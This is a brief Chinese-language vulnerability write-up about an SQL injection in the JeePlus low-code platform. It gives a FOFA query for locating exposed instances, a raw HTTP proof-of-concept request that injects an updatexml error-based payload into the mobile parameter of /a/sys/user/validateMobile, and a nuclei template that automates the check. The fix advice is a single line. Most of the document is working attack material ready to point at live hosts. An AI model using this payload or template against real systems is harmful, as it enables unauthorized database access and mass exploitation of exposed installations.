JeePlus低代码开发平台存在SQL注入漏洞复现
1.漏洞介绍
JeePlus低代码开发平台存在SQL注入漏洞
2.漏洞编号
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3.影响范围
名称 | 版本号 |
---|---|
- |
4.检索特征
FOFA:app=“JeePlus”
5.POC
GET /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%281%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/2
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
nuclei检测
id: JeePlus-SQLi
info:
name: JeePlus低代码开发平台存在SQL注入漏洞
author: test
severity: high
description: |
JeePlus低代码开发平台存在SQL注入漏洞
metadata:
fofa-query: app="JeePlus"
reference:
- https://127.0.0.1
tags: auto
http:
- raw:
- |
GET /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%281%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
matchers-condition: and
matchers:
- type: word
part: body
words:
- "c4ca4238a0b923820dcc509a6f75849"
6.修复建议
更新到最新版本